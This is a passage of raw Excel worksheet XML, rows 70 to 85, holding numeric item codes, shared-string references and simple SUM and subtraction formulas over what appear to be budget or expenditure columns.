      <c r="P70" s="17"/>
      <c r="Q70" s="17"/>
      <c r="R70" s="17"/>
      <c r="S70" s="17"/>
      <c r="T70" s="17"/>
      <c r="U70" s="17">
        <v>72</v>
      </c>
      <c r="V70" s="17"/>
      <c r="W70" s="17"/>
      <c r="X70" s="17"/>
      <c r="Y70" s="17"/>
      <c r="Z70" s="17"/>
      <c r="AA70" s="17"/>
      <c r="AB70" s="17"/>
      <c r="AC70" s="17"/>
      <c r="AD70" s="17"/>
      <c r="AE70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AF70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AG70" s="17">
        <f t="shared" si="23"/>
        <v>11</v>
      </c>
      <c r="AH70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AI70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AJ70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AK70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AL70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AM70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AN70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AO70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AP70" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="18" customHeight="1" spans="1:42">
      <c r="A71" s="10">
        <v>1010421</v>
      </c>
      <c r="B71" s="16" t="s">
        <v>2626</v>
      </c>
      <c r="C71" s="17">
        <v>0</v>
      </c>
      <c r="D71" s="13">
        <v>2010699</v>
      </c>
      <c r="E71" s="16" t="s">
        <v>2627</v>
      </c>
      <c r="F71" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>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f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AF71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AG71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AH71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AI71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AJ71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AK71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AL71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AM71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AN71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AO71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AP71" s="17">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="18" customHeight="1" spans="1:42">
      <c r="A72" s="10">
        <v>1010422</v>
      </c>
      <c r="B72" s="16" t="s">
        <v>2628</v>
      </c>
      <c r="C72" s="17">
        <v>0</v>
      </c>
      <c r="D72" s="13">
        <v>20107</v>
      </c>
      <c r="E72" s="11" t="s">
        <v>2629</v>
      </c>
      <c r="F72" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="G72" s="12">
        <f t="shared" ref="G72:R72" si="25">SUM(G73:G79)</f>
        <v>0</v>
      </c>
      <c r="H72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="I72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="K72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="L72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="M72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="N72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="O72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="P72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="Q72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="R72" s="12">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="S72" s="12">
        <v>0</v>
      </c>
      <c r="T72" s="12">
        <v>0</v>
      </c>
      <c r="U72" s="12">
        <v>0</v>
      </c>
      <c r="V72" s="12">
        <v>0</v>
      </c>
      <c r="W72" s="12">
        <v>0</v>
      </c>
      <c r="X72" s="12">
        <v>0</v>
      </c>
      <c r="Y72" s="12">
        <v>0</v>
      </c>
      <c r="Z72" s="12">
        <v>0</v>
      </c>
      <c r="AA72" s="12">
        <v>0</v>
      </c>
      <c r="AB72" s="12">
        <v>0</v>
      </c>
      <c r="AC72" s="12">
        <v>0</v>
      </c>
      <c r="AD72" s="12">
        <v>0</v>
      </c>
      <c r="AE72" s="12">
        <f t="shared" ref="AE72:AP72" si="26">SUM(AE73:AE79)</f>
        <v>0</v>
      </c>
      <c r="AF72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AG72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AH72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AI72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AJ72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AK72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AL72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AM72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AN72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AO72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="AP72" s="12">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="18" customHeight="1" spans="1:42">
      <c r="A73" s="10">
        <v>1010423</v>
      </c>
      <c r="B73" s="16" t="s">
        <v>2630</v>
      </c>
      <c r="C73" s="17">
        <v>0</v>
      </c>
      <c r="D73" s="13">
        <v>2010701</v>
      </c>
      <c r="E73" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F73" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>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f t="shared" ref="AE73:AP79" si="27">G73-S73</f>
        <v>0</v>
      </c>
      <c r="AF73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AG73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AH73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AI73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AJ73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AK73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AL73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AM73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AN73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AO73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AP73" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="18" customHeight="1" spans="1:42">
      <c r="A74" s="10">
        <v>1010424</v>
      </c>
      <c r="B74" s="16" t="s">
        <v>2631</v>
      </c>
      <c r="C74" s="17">
        <v>0</v>
      </c>
      <c r="D74" s="13">
        <v>2010702</v>
      </c>
      <c r="E74" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F74" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>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f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AF74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AG74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AH74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AI74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AJ74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AK74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AL74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AM74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AN74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AO74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AP74" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="18" customHeight="1" spans="1:42">
      <c r="A75" s="10">
        <v>1010425</v>
      </c>
      <c r="B75" s="16" t="s">
        <v>2632</v>
      </c>
      <c r="C75" s="17">
        <v>0</v>
      </c>
      <c r="D75" s="13">
        <v>2010703</v>
      </c>
      <c r="E75" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F75" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>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f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AF75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AG75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AH75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AI75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AJ75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AK75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AL75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AM75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AN75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AO75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AP75" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="18" customHeight="1" spans="1:42">
      <c r="A76" s="10">
        <v>1010426</v>
      </c>
      <c r="B76" s="16" t="s">
        <v>2633</v>
      </c>
      <c r="C76" s="17">
        <v>0</v>
      </c>
      <c r="D76" s="13">
        <v>2010709</v>
      </c>
      <c r="E76" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F76" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>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f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AF76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AG76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AH76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AI76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AJ76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AK76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AL76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AM76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AN76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AO76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AP76" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="18" customHeight="1" spans="1:42">
      <c r="A77" s="10">
        <v>1010427</v>
      </c>
      <c r="B77" s="16" t="s">
        <v>2634</v>
      </c>
      <c r="C77" s="17">
        <v>0</v>
      </c>
      <c r="D77" s="13">
        <v>2010710</v>
      </c>
      <c r="E77" s="16" t="s">
        <v>2635</v>
      </c>
      <c r="F77" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>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f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AF77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AG77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AH77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AI77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AJ77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AK77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AL77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AM77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AN77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AO77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AP77" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="18" customHeight="1" spans="1:42">
      <c r="A78" s="10">
        <v>1010428</v>
      </c>
      <c r="B78" s="16" t="s">
        <v>2636</v>
      </c>
      <c r="C78" s="17">
        <v>0</v>
      </c>
      <c r="D78" s="13">
        <v>2010750</v>
      </c>
      <c r="E78" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F78" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>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f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AF78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AG78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AH78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AI78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AJ78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AK78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AL78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AM78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AN78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AO78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AP78" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="18" customHeight="1" spans="1:42">
      <c r="A79" s="10">
        <v>1010429</v>
      </c>
      <c r="B79" s="16" t="s">
        <v>2637</v>
      </c>
      <c r="C79" s="17">
        <v>0</v>
      </c>
      <c r="D79" s="13">
        <v>2010799</v>
      </c>
      <c r="E79" s="16" t="s">
        <v>2638</v>
      </c>
      <c r="F79" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="G79" s="17"/>
      <c r="H79" s="17"/>
      <c r="I79" s="17"/>
      <c r="J79" s="17"/>
      <c r="K79" s="17"/>
      <c r="L79" s="17"/>
      <c r="M79" s="17"/>
      <c r="N79" s="17"/>
      <c r="O79" s="17"/>
      <c r="P79" s="17"/>
      <c r="Q79" s="17"/>
      <c r="R79" s="17"/>
      <c r="S79" s="17"/>
      <c r="T79" s="17"/>
      <c r="U79" s="17"/>
      <c r="V79" s="17"/>
      <c r="W79" s="17"/>
      <c r="X79" s="17"/>
      <c r="Y79" s="17"/>
      <c r="Z79" s="17"/>
      <c r="AA79" s="17"/>
      <c r="AB79" s="17"/>
      <c r="AC79" s="17"/>
      <c r="AD79" s="17"/>
      <c r="AE79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AF79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AG79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AH79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AI79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AJ79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AK79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AL79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AM79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AN79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AO79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AP79" s="17">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="18" customHeight="1" spans="1:42">
      <c r="A80" s="10">
        <v>1010430</v>
      </c>
      <c r="B80" s="16" t="s">
        <v>2639</v>
      </c>
      <c r="C80" s="17">
        <v>0</v>
      </c>
      <c r="D80" s="13">
        <v>20108</v>
      </c>
      <c r="E80" s="11" t="s">
        <v>2640</v>
      </c>
      <c r="F80" s="14">
        <f t="shared" si="24"/>
        <v>19</v>
      </c>
      <c r="G80" s="12">
        <f t="shared" ref="G80:R80" si="28">SUM(G81:G88)</f>
        <v>0</v>
      </c>
      <c r="H80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="I80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="K80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="L80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="M80" s="12">
        <f t="shared" si="28"/>
        <v>19</v>
      </c>
      <c r="N80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="O80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="P80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="Q80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="R80" s="12">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="S80" s="12">
        <v>0</v>
      </c>
      <c r="T80" s="12">
        <v>0</v>
      </c>
      <c r="U80" s="12">
        <v>0</v>
      </c>
      <c r="V80" s="12">
        <v>0</v>
      </c>
      <c r="W80" s="12">
        <v>0</v>
      </c>
      <c r="X80" s="12">
        <v>0</v>
      </c>
      <c r="Y80" s="12">
        <v>19</v>
      </c>
      <c r="Z80" s="12">
        <v>0</v>
      </c>
      <c r="AA80" s="12">
        <v>0</v>
      </c>
      <c r="AB80" s="12">
        <v>0</v>
      </c>
      <c r="AC80" s="12">
        <v>0</v>
      </c>
      <c r="AD80" s="12">
        <v>0</v>
      </c>
      <c r="AE80" s="12">
        <f t="shared" ref="AE80:AP80" si="29">SUM(AE81:AE88)</f>
        <v>0</v>
      </c>
      <c r="AF80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AG80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AH80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AI80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AJ80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AK80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AL80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AM80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AN80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AO80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="AP80" s="12">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="18" customHeight="1" spans="1:42">
      <c r="A81" s="10">
        <v>1010431</v>
      </c>
      <c r="B81" s="16" t="s">
        <v>2641</v>
      </c>
      <c r="C81" s="17">
        <v>0</v>
      </c>
      <c r="D81" s="13">
        <v>2010801</v>
      </c>
      <c r="E81" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F81" s="14">
        <f t="shared" si="24"/>
        <v>19</v>
      </c>
      <c r="G81" s="17"/>
      <c r="H81" s="17"/>
      <c r="I81" s="17"/>
      <c r="J81" s="17"/>
      <c r="K81" s="17"/>
      <c r="L81" s="17"/>
      <c r="M81" s="17">
        <v>19</v>
      </c>
      <c r="N81" s="17"/>
      <c r="O81" s="17"/>
      <c r="P81" s="17"/>
      <c r="Q81" s="17"/>
      <c r="R81" s="17"/>
      <c r="S81" s="17"/>
      <c r="T81" s="17"/>
      <c r="U81" s="17"/>
      <c r="V81" s="17"/>
      <c r="W81" s="17"/>
      <c r="X81" s="17"/>
      <c r="Y81" s="17">
        <v>19</v>
      </c>
      <c r="Z81" s="17"/>
      <c r="AA81" s="17"/>
      <c r="AB81" s="17"/>
      <c r="AC81" s="17"/>
      <c r="AD81" s="17"/>
      <c r="AE81" s="17">
        <f t="shared" ref="AE81:AP88" si="30">G81-S81</f>
        <v>0</v>
      </c>
      <c r="AF81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AG81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AH81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AI81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AJ81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AK81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AL81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AM81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AN81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AO81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AP81" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="18" customHeight="1" spans="1:42">
      <c r="A82" s="10">
        <v>1010432</v>
      </c>
      <c r="B82" s="16" t="s">
        <v>2642</v>
      </c>
      <c r="C82" s="17">
        <v>0</v>
      </c>
      <c r="D82" s="13">
        <v>2010802</v>
      </c>
      <c r="E82" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F82" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="G82" s="17"/>
      <c r="H82" s="17"/>
      <c r="I82" s="17"/>
      <c r="J82" s="17"/>
      <c r="K82" s="17"/>
      <c r="L82" s="17"/>
      <c r="M82" s="17"/>
      <c r="N82" s="17"/>
      <c r="O82" s="17"/>
      <c r="P82" s="17"/>
      <c r="Q82" s="17"/>
      <c r="R82" s="17"/>
      <c r="S82" s="17"/>
      <c r="T82" s="17"/>
      <c r="U82" s="17"/>
      <c r="V82" s="17"/>
      <c r="W82" s="17"/>
      <c r="X82" s="17"/>
      <c r="Y82" s="17"/>
      <c r="Z82" s="17"/>
      <c r="AA82" s="17"/>
      <c r="AB82" s="17"/>
      <c r="AC82" s="17"/>
      <c r="AD82" s="17"/>
      <c r="AE82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AF82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AG82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AH82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AI82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AJ82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AK82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AL82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AM82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AN82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AO82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AP82" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="18" customHeight="1" spans="1:42">
      <c r="A83" s="10">
        <v>1010433</v>
      </c>
      <c r="B83" s="16" t="s">
        <v>2643</v>
      </c>
      <c r="C83" s="17">
        <v>0</v>
      </c>
      <c r="D83" s="13">
        <v>2010803</v>
      </c>
      <c r="E83" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F83" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="G83" s="17"/>
      <c r="H83" s="17"/>
      <c r="I83" s="17"/>
      <c r="J83" s="17"/>
      <c r="K83" s="17"/>
      <c r="L83" s="17"/>
      <c r="M83" s="17"/>
      <c r="N83" s="17"/>
      <c r="O83" s="17"/>
      <c r="P83" s="17"/>
      <c r="Q83" s="17"/>
      <c r="R83" s="17"/>
      <c r="S83" s="17"/>
      <c r="T83" s="17"/>
      <c r="U83" s="17"/>
      <c r="V83" s="17"/>
      <c r="W83" s="17"/>
      <c r="X83" s="17"/>
      <c r="Y83" s="17"/>
      <c r="Z83" s="17"/>
      <c r="AA83" s="17"/>
      <c r="AB83" s="17"/>
      <c r="AC83" s="17"/>
      <c r="AD83" s="17"/>
      <c r="AE83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AF83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AG83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AH83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AI83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AJ83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AK83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AL83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AM83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AN83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AO83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AP83" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="18" customHeight="1" spans="1:42">
      <c r="A84" s="10">
        <v>1010434</v>
      </c>
      <c r="B84" s="16" t="s">
        <v>2644</v>
      </c>
      <c r="C84" s="17">
        <v>0</v>
      </c>
      <c r="D84" s="13">
        <v>2010804</v>
      </c>
      <c r="E84" s="16" t="s">
        <v>2645</v>
      </c>
      <c r="F84" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="G84" s="17"/>
      <c r="H84" s="17"/>
      <c r="I84" s="17"/>
      <c r="J84" s="17"/>
      <c r="K84" s="17"/>
      <c r="L84" s="17"/>
      <c r="M84" s="17"/>
      <c r="N84" s="17"/>
      <c r="O84" s="17"/>
      <c r="P84" s="17"/>
      <c r="Q84" s="17"/>
      <c r="R84" s="17"/>
      <c r="S84" s="17"/>
      <c r="T84" s="17"/>
      <c r="U84" s="17"/>
      <c r="V84" s="17"/>
      <c r="W84" s="17"/>
      <c r="X84" s="17"/>
      <c r="Y84" s="17"/>
      <c r="Z84" s="17"/>
      <c r="AA84" s="17"/>
      <c r="AB84" s="17"/>
      <c r="AC84" s="17"/>
      <c r="AD84" s="17"/>
      <c r="AE84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AF84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AG84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AH84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AI84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AJ84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AK84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AL84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AM84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AN84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AO84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AP84" s="17">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="18" customHeight="1" spans="1:42">
      <c r="A85" s="10">
        <v>1010435</v>
      </c>
      <c r="B85" s="16" t="s">
        <v>2646</v>
      </c>
      <c r="C85" s="17">
        <v>0</v>
      </c>
      <c r="D85" s="13">
        <v>2010805</v>
      </c>
      <c r="E85" s="16" t="s">
        <v>2647</v>
      </c>
      <c r="F85" s="14">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="G85" s="17"/>
      <c r="H85" s="17"/>
      <c r="I85" s="17"/>
      <c r="J85" s="17"/>
      <c r="K85" s="17"/>
      <c r="L85" s="17"/>
      <c r="M85" s="17"/>
